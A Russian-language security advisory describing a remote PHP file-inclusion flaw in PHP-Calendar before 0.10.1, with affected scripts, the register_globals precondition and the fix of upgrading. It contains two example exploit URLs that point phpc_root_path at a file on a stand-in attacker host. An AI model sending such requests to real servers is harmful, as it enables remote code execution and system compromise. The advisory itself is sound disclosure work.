PHP-инклюдинг в PHP-Calendar

Дата публикации:
31.12.2004
Дата изменения:
27.02.2009
Всего просмотров:
1173
Опасность:
Высокая
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
PHP-Calendar 0.x
Уязвимые версии: PHP-Calendar версии до 0.10.1

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "phpc_root_path" в сценариях includes/calendar.php и includes/setup.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена в конфигурационном файле PHP. Пример:

http://[host]/path/includes/calendar.php?phpc_root_path=http://[attacker]/includes/html.php
http://[host]/path/includes/setup.php?phpc_root_path=http:// [attacker]/includes/html.php

URL производителя: php-calendar.sourceforge.net

Решение: Установите последнюю версию 0.10.1 с сайта производителя.

Журнал изменений:

27.02.2009
Изменено описание уязвимости, изменена секция «Решение».

Ссылки: PHP-Calendar Include File Flaw Lets Remote Users Execute Arbitrary Commands

или введите имя

CAPTCHA